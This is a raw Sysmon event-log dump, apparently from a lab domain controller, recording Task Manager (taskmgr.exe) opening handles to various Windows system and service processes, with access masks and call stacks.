21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3400-00000000A301}3104C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204958Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3400-00000000A301}3104C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204957Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3400-00000000A301}3104C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204956Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3200-00000000A301}2136C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204955Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3200-00000000A301}2136C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204954Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3200-00000000A301}2136C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204953Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3200-00000000A301}2136C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204952Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3200-00000000A301}2136C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204951Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3100-00000000A301}2268C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204950Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3100-00000000A301}2268C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204949Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3100-00000000A301}2268C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204948Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3100-00000000A301}2268C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204947Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3100-00000000A301}2268C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204946Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204945Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204944Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204943Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204942Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204941Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204940Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204939Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204938Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204937Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2D00-00000000A301}2212C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204936Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2D00-00000000A301}2212C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204935Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2D00-00000000A301}2212C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204934Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2D00-00000000A301}2212C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204933Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2D00-00000000A301}2212C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204932Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2C00-00000000A301}2592C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204931Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2C00-00000000A301}2592C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204930Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2C00-00000000A301}2592C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204929Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2C00-00000000A301}2592C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204928Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2C00-00000000A301}2592C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204927Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2B00-00000000A301}2724C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204926Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2B00-00000000A301}2724C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204925Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7CCF-6019-2B00-00000000A301}2724C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204924Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 